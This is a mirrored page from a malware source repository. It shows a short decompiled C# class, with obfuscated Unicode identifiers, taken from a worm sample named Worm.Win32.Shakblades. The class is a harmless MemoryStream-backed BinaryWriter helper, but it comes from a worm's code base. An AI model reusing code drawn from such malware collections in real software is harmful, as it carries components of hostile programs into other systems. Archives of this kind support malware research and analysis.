mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
31 lines
1011 B
C#
31 lines
1011 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: Ҧ߲๒ʽ໙ୄᴘ.์ኘ᳒ধڿቷ፳৶
|
|||
|
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
|
|||
|
|
|||
|
using System.IO;
|
|||
|
|
|||
|
namespace Ҧ߲๒ʽ໙ୄᴘ
|
|||
|
{
|
|||
|
internal class \u0E4Cኘ᳒ধڿቷ\u1373\u09F6 : BinaryWriter
|
|||
|
{
|
|||
|
private MemoryStream \u1B60ᘠཊܓԎ\u0C79Ҹ;
|
|||
|
|
|||
|
public \u0E4Cኘ᳒ধڿቷ\u1373\u09F6()
|
|||
|
{
|
|||
|
this.\u1B60ᘠཊܓԎ\u0C79Ҹ = new MemoryStream();
|
|||
|
this.OutStream = (Stream) this.\u1B60ᘠཊܓԎ\u0C79Ҹ;
|
|||
|
}
|
|||
|
|
|||
|
public byte[] ࠨ಼\u10CEᇥ\u1CA0ฉ()
|
|||
|
{
|
|||
|
this.Close();
|
|||
|
byte[] array = this.\u1B60ᘠཊܓԎ\u0C79Ҹ.ToArray();
|
|||
|
this.\u1B60ᘠཊܓԎ\u0C79Ҹ.Dispose();
|
|||
|
this.\u1B60ᘠཊܓԎ\u0C79Ҹ = (MemoryStream) null;
|
|||
|
return array;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|